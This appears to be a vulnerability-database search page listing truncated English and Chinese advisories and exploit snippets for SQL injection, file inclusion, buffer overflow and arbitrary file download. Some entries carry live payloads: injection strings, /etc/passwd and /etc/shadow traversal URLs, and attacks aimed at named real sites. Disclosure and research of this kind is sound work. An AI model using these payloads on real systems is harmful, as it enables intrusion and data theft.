56796 matches found
KwsPHP Module jeuxflash (cat) Remote SQL Injection Vulnerability
No description provided by source. KwsPHP Module jeuxflash Remote SQL Injection Exploit AUTHOR : HouSSamix From H-T Team Script : KwsPHP Module jeuxflash Version : last version Bug : Remote SQL Injection Exploit Dork : inurl:index.php?mod=jeuxflash EXPLOITS :...
PHP <= 4.4.6 ibase_connect() Local Buffer Overflow Exploit
No description provided by source. ?php // PHP = 4.4.6 ibaseconnect & ibasepconnect local buffer overflow // poc exploit // windows 2000 sp3 en / seh overwrite // by rgod // site: http://retrogod.altervista.org if !extensionloaded"interbase" die"only works with interbase extension "; $scode=...
HP多个产品PML Driver HPZ12服务本地权限提升漏洞
PML Driver HPZ12服务是很多HP产品(尤其是多合一产品、打印机、扫描仪等)所安装的驱动服务。 PML Driver HPZ12服务在执行权限管理时存在漏洞,本地攻击者可能利用此权限提升自己的权限。 PML Driver HPZ12服务没有设置安全的SERVICECHANGECONFIG权限。默认下安装该服务时有以下属性: Name: PML Driver HPZ12 Filename: HPZipm12.exe Description: Used by HP Printer/Scanner/Copier printers to prevent Windows from...
phplive support request.php文件存在SQL注入漏洞以及暴绝对路径漏洞
暂无 php live =3.2.2 无 http://xxx.com/livechat/request.php?l=login&x=1%20and%20select%20count%20from%20mysql.user0/ 表: chatadmin login password ---------------------------------------------------------- 绝对路径 http://xxx.co...
CoolPlayer多个缓冲区溢出漏洞
CoolPlayer是一款媒体播放程序。 CoolPlayer存在多个缓冲区溢出问题,远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。 攻击者可以构建恶意的文件,诱使用户打开来触发,可导致以应用程序进程权限执行任意指令。 CoolPlayer CoolPlayer 215 升级程序: CoolPlayer CoolPlayer 215 CoolPlayer CoolPlayer216Bin.zip http://downloads.sourceforge.net/coolplayer/CoolPlayer216Bin.zip 可参考如下测试文件:...
NETGEAR R7000 缓冲区溢出漏洞(CVE-2021-31802)
SSD Advisory – NETGEAR Nighthawk R7000 httpd PreAuth RCE April 26, 2021 SSD Disclosure / Technical Lead Uncategorized TL;DR Find out how a vulnerability in NETGEAR R7000 allows an attacker to run arbitrary code without requiring authentication with the device. Vulnerability Summary A vulnerabilit...
Apache Druid远程代码执行漏洞(CVE-2021-26919)
...
MacOS so_pcb type confusion in necp_get_socket_attributes(CVE-2017-13855)
When getsockopt edited; original report said "setsockopt" is called on any socket with level SOLSOCKET and optname SONECPATTRIBUTES, necpgetsocketattributes is invoked. necpgetsocketattributes unconditionally calls sotoinpcbso: errnot necpgetsocketattributesstruct socket so, struct sockopt sopt i...
Apache James Deserialization RCE(CVE-2017-12628)
Analysis of CVE-2017-12628 This morning I spotted a tweet mentioning an “Apache James 3.0.1 JMX Server Deserialization” vulnerability, CVE-2017-12628, which caught my eye because I wrote a generic JMX deserialization exploit which is included in my RMI attack tool BaRMIe. A quick search for more...
Broadcom: Heap overflow when handling 802.11v WNM Sleep Mode Response(CVE-2017-7065)
Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. In order to allow clients to configure...
Serv-U FTP/MFT Server Unauthenticated Privilege Escalation
Details source: https://www.trustwave.com/Resources/SpiderLabs-Blog/Exploiting-Privilege-Escalation-in-Serv-U-by-SolarWinds/?page=1&year=0&month=0 I was recently working on an external network penetration test where I identified a new vulnerability in a file sharing web application called Serv-U ...
emlog 5.1.2 登录验证码绕过(可爆破后台)
No description provided by source...
Discuz!3.2 利用UC_KEY登陆任意用户
几乎所有版本都可以吧(在得到uckey情况下)/api/uc.php里面有个synlogin方法function synlogin$get, $post global $G; if!APISYNLOGIN return APIRETURNFORBIDDEN; header'P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'; $cookietime = 31536000; $uid = intval$get'uid'; if$member =...
DedeCms 5.6 /plus/carbuyaction.php 本地文件包含漏洞
No description provided by source...
PunBB <= 1.2.16 - Blind Password Recovery Exploit
No description provided by source. ?php / Original : http://sektioneins.de/advisories/SE-2008-01.txt Thanks to Stefan Esser, here's the exploit. Team : EpiBite firefox, petit-poney, thot Nous tenons a remercier nos mamans et papas respectifs. Let's get a fu coffee ! / // conf define'URL',...
DUware DUclassmate 1.x edit.asp iPro Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/14036/info DUclassmate is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit could allow an attacker...
Java Web Start Launcher ActiveX Control - Memory Corruption
No description provided by source. SEC Consult Vulnerability Lab Security Advisory 20130417-1 ======================================================================= title: Java ActiveX Control Memory Corruption product: JavaTM Web Start Launcher vulnerable version: Sun Java Version 7 Update 17 a...
LiteNews <= 0.1 Insecure Cookie Handling Vulnerability
No description provided by source. litenews-01 = 1.2 Insecure Cookie Handling Vulnerability AUTHOR : Scary-Boys HOME : http://scary-boys.com Download : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.htmldownloadlocations DorKs : Powered By litenews DESCRIPTION : Maian...
Coppermine Photo Gallery 1.3/1.4 YABBSE.INC.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/25243/info Coppermine Photo Gallery is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application a...
大汉网络JCMS任意文件下载
简要描述: 绝对路径文件下载的问题。 详细说明: 通过分析代码,某个下载功能没有限制权限,没有限制下载类型,通过设置绝对路径的参数,直接下载。 漏洞利用: jcms\m19\user\down.jsp?abspathfile=/etc/passwd 漏洞证明: 测试代码: http://www.njgl.gov.cn/jcms/m19/user/down.jsp?abspathfile=/etc/passwd 鼓楼区政府门户网站: 下载文件内容:...
Apache Tomcat DIGEST Authentication重放攻击漏洞(CVE-2013-2051)
BUGTRAQ ID: 60187 CVECAN ID: CVE-2013-2051 Apache Tomcat是一个流行的开源JSP应用服务器程序。 Apache Tomcat 7.0.0 - 7.0.30、6.0.0 - 6.0.36、5.5.0 - 5.5.36的DIGEST验证存在重放攻击漏洞,此漏洞源于CVE-2012-5887的不完整修复,可导致绕过某些安全限制,执行未授权操作。 0 Apache Group Tomcat 7.0.0 - 7.0.30 Apache Group Tomcat 6.0.0 - 6.0.36 Apache Group Tomcat 5.5.0 -...
Apache Tomcat FORM身份验证安全绕过漏洞
BUGTRAQ ID: 56812 CVECAN ID: CVE-2012-3546 Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。 Tomcat v7.0.30、6.0.36之前版本在FORM身份验证的实现上存在安全漏洞。在使用FORM验证时,若其他组件(如Single-Sign-On)在调用FormAuthenticatorauthenticate之前调用了request.setUserPrincipal,则攻击者可以通过在URL结尾添加"/jsecuritycheck"以绕过FORM验证 0 Apache Group Tomcat 7.0.0 - 7.0.2...
Samba < 3.6.3 版本ndr_pull_lsa_SidArray堆溢出漏洞(CVE-2012-1182)
CVE ID: CVE-2012-1182 Samba是一套实现SMB(Server Messages Block)协议、跨平台进行文件共享和打印共享服务的程序。 Samba 3.6.3之前版本的RPC代码生成器存在错误,导致生成的代码中包含安全漏洞,这些生成的代码用在Samba控制RPC网络数据处理的部分。攻击者可通过特制的RPC调用无需用户验证造成服务器执行任意代码。 0 Samba 3.6.3 厂商补丁: Samba ----- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.samba.org/...
WordPress GD Star Rating plugin <= 1.9.10 SQL Injection
No description provided by source. Exploit Title: WordPress GD Star Rating plugin = 1.9.10 SQL Injection Vulnerability Date: 2011-09-26 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/gd-star-rating.zip Version: 1.9.10 tested Not...
Linux Kernel "net/"子系统"af_packet.c"本地信息泄露漏洞
BUGTRAQ ID: 48986 Linux Kernel是Linux操作系统的内核。 Linux Kernel的 "net/"子系统"afpacket.c"在实现上存在本地信息泄露漏洞,本地攻击者可利用此漏洞获取敏感信息。 Linux kernel 2.6.x 厂商补丁: Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.kernel.org/...
Linux Kernel e1000e驱动巨型帧处理绕过安全检查漏洞
BUGTRAQ ID: 37523 CVECAN ID: CVE-2009-4538 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel所使用的e1000e驱动中drivers/net/e1000e/netdev.c没有正确地检查超过MTU的以太网帧的大小,远程攻击者可以绕过已有的碎片检查,导致部分无效的帧传送给网络栈。 Linux kernel 2.6.32.3 厂商补丁: RedHat ------ RedHat已经为此发布了一个安全公告(RHSA-2010:0019-01)以及相应补丁: RHSA-2010:0019-01:Importan...
CMScontrol 7.x (index.php id_menu) SQL Injection Vulnerability
No description provided by source. =Info======================================================================= Software: CMScontrol Content Management Portal Solutions Sql Injection Version: 7. Vulnerability: Remote Sql Injection Google Dork: "index.php?idmenu=" CMScontrol Off. site:...
帝国(EmpireCMS) 5.1 多个注射漏洞
EmpireCMS 5.1 有个过滤函数没处理好\,可能导致产生多处垃圾类型的注射漏洞 比如留言处注射: e/tool/gbook/?bid=1 姓名: 縗\ 邮箱:,1,1,1,select concatusername,0x5f,password,0x5f,rnd from phomeenewsuser where userid=1,1,1,1,0,0,0/ 电话和留言内容随便写,提交完了就可以看到密码了 EmpireCMS 5.1 暂无, www.phome.net/...
Advanced Image Hosting (AIH) 2.3 (gal) Blind SQL Injection Vuln
No description provided by source. Advanced Image Hosting AIH Remote Blind SQL Injection Author : boom3rang Greetz : H!tm@N, KHG, chs, redc00de Vulnerability : Blind SQL injection Google Dork : Powered by: AIH v2.3 -------------------------------------------------- ! Product Name : Advanced Image...
Apache Tomcat POST数据信息泄漏漏洞
BUGTRAQ ID: 33913 CVE ID:CVE-2008-4308 CNCVE ID:CNCVE-20084308 Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。 Apache Tomcat POST数据处理存在问题,远程攻击者可以利用漏洞获得敏感信息。 处理POST数据存在错误,可导致攻击者获得之前请求的POST内容信息,包括其他用户请求数据中的密码,会话ID和用户ID。 Fujitsu INTERSTAGE Studio Standard-J Edition 9.0 Fujitsu INTERSTAGE Studio Enterprise Editi...
BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)
No description provided by source. / Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack Compilation: $ gcc -o kaminsky-attack kaminsky-attack.c dnet-config --libs -lm Dependency: libdnet aka libdumbnet-dev under Ubuntu Author: marc.bevand at rapid7 dot com / define BSDSOURCE include...
CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability
No description provided by source. author:meoconxatvnbrain.net product:CartWeaver main site:www.cartweaver.com 1.with CFM CartWeaver: sql injection in: Details.cfm?ProdID=a' demo: http://www.jbracing.co.uk/Details.cfm?ProdID=1' exploit: http://www.xxx.com/Details.cfm?ProdID=sql query link admin:...
IM+本地明文用户名口令泄露漏洞
IM+是一款即时消息软件,允许用户同时连接到多个即时消息帐号。 IM+在处理存储用户名口令时存在漏洞,本地攻击者可能利用此漏洞轻易获取认证信息。 IM+没有使用任何安全措施或加密保护即时消息帐号的用户名和口令。恶意用户可以在\Program Files\IMPlus目录下获得implus.cfg文件,然后使用文本编辑器打开该文件,浏览所有帐号信息,包括明文的用户名和口令。 SHAPE Services IM+ v3.10 for Pocket PC 我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:...
maluinfo <= 206.2.38 (bb_usage_stats.php) Remote File Include Exploit
No description provided by source. !/usr/bin/perl maluinfo 206.2.38 brazilian PHPBB Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high...
Joomla Link Directory Component <= 1.0.3 Remote Include Vulnerability
No description provided by source. .: insecurity research team :. ....:...:. . .:. | |/ :/ // :/ .:. : | | | \\ /\ / :. . ..: ||| / \ \ .: .:.. .. ./ .:/:. ./. .:/: . ...:. .advisory. .:... :..................: 18.o8.2oo6 .. Affected Application: Link Directory = v1.0.3 Mambo/Joomla CMS...
AfterLogic 多个安全漏洞(CVE-2021-26292 CVE-2021-26293 CVE-2021-26294)
CVE-2021-26292 - Public Full Path Disclosure on AfterLogic Aurora & WebMail Pro WebDAV EndPoint The severity of the issue: Medium Complexity: Easy Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO Authentication: Not required Attacks: Full Path Disclosure Resources : -...
IE11: Use-after-free in Js::RegexHelper::RegexReplace(CVE-2018-0866)
There is a Use-after-free vulnerability in Internet Explorer that could potentially be used for memory disclosure. This was tested on IE11 running on Window 7 64-bit with the latest patches applied. Note that the PoC was tested in a 64-bit tab process via TabProcGrowth=0 registry flag and the pag...
Windows Kernel pool memory disclosure in nt!NtNotifyChangeDirectoryFile(CVE-2017-0299)
We have discovered that the nt!NtNotifyChangeDirectoryFile system call discloses portions of uninitialized pool memory to user-mode clients, due to output structure alignment holes. On our test Windows 10 32-bit workstation, an example layout of the output buffer is as follows: --- cut ---...
Git Shell Bypass By Abusing Less (CVE-2017-8386)
The git-shell is a restricted shell maintained by the git developers and is meant to be used as the upstream peer in a git remote session over a ssh tunnel. The basic idea behind this shell is to restrict the allowed commands in a ssh session to the ones required by git which are as follows:...
SNMP Incorrect Access Control Vulnerability (CVE 2017-5135) (StringBleed)
In DEFCON 24 IoT Village i gave a talk about the danger of SNMP write properties enabled devices in the IoT, police patrols, ambulances and other in the “critical mission vehicles” were affected in that research. In December 2016 with a colleague from Argentina Ezequiel Fernandez we decided to...
ILAS图书管理系统 BookRetr.aspx 参数KeyWord SQL注入漏洞
0x01 框架介绍 相关厂商: 深圳市科图自动化新技术应用公司 提交时间: 2015-06-28 漏洞类型: SQL注射漏洞 官方主页: www.ilas.com.cn ILASIII “数字图书馆体系结构研究与应用平台开发”项目(简称ILAS III)是我公司继ILAS II、UACN之后又一次为全国图书馆界提供的应用软件平台,该项目于2005年5月通过了文化部鉴定,专家一致认为:ILAS III在分布式的体系结构、跨平台和跨数据库应用、系统实用性和功能完备性等方面达到了国内领先水平。 ILAS...
yershop商城系统/index.php?s=/Home/account/savepaykey.html等30处 SQL注入漏洞
No description provided by source...
PageAdmin CMS最新版二次注入
简要描述: 发现PageAdmin官网更新了版本,就去复查了一下,然后发现厂商的修复手段等于没修复! http://www.pageadmin.net/soft/ 选择本地下载最新版,PageAdmin V3.0.20151204最后更新时间:2016-03-11 Demo站换了后台地址,这次仅在本地复现。 详细说明: 0 之前的漏洞是这个 http://.../bugs/wooyun-2016-0177673 1 依旧是/e/master/buildstatic.aspx 这个页面 原来的代码是这样的: ifIsNumIds sql="select...
ZTE OLT C200 telnet 弱口令
No description provided by source...
远古流媒体系统 POST注入漏洞
username=%27%20and%201%3Dconvert%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2bdbname%28%29%2bCHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29-- URL:http://xxx.com/VIEWGOOD/ADI/portal/UserDataSync.aspx POST:UserGUID=1' and...
上海寰创 WLAN 产品 DownloadServlet 任意文件下载漏洞
访问如下URL,可任意下载系统文件: http://ip:port/DownloadServlet?fileName=../../etc/shadow...
通用图书馆集成系统GLIS9.0高危注入
简要描述: RT 详细说明: 厂商:北京清大新洋科技有限公司 官网:http://.../ 用户:http://.../yonghu.html 这系统卖的挺贵的啊,看产品报价:http://.../cp/glis90.html 产品名称:通用图书馆集成系统GLIS9.0 市场价格:198000元FOR WIN、228000元FOR UNIX 代理价格:138600元FOR WIN、159600元FOR UNIX 其它:以上报价为基本版,每增加一个用户加5000元。 每次提洞在wooyun先看前辈的洞,然后接着挖 http://.../bugs/wooyun-2010-099335...
shopNC B2B版SQL注入一枚
简要描述: 无需登录直接出数据 详细说明: 为了节省审核时间,先来五个实例 http://www.xiu365.cn/microshop/index.php?act=personal&classid0=exp&classid1=1%20or%20updatexml1,concat0x5c,user,1%23 http://www.xiu365.cn/microshop/index.php?act=personal&classid0=exp&classid1=1%20or%20updatexml1,concat0x5c,user,1%23...
Wordpress多个主题任意文件下载漏洞
No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '1679' vul ID version = '1' author = 'zhengdt' vulDate = '2014-10-06' createDate ...
万户OA所有版本任意文件下载
简要描述: 万户OA任意文件下载漏洞 详细说明: 万户OAdownloadold.jsp文件可以任意访问,导致无需登录,下载任意文件 测试URL: /defaultroot/downloadold.jsp?path=..&name=x&FileName=index.jsp /defaultroot/downloadold.jsp?path=..&name=x&FileName=WEB-INF/web.xml 快下班了,时间不够了,测试地址就不贴了,自行测试哈。。 漏洞证明:...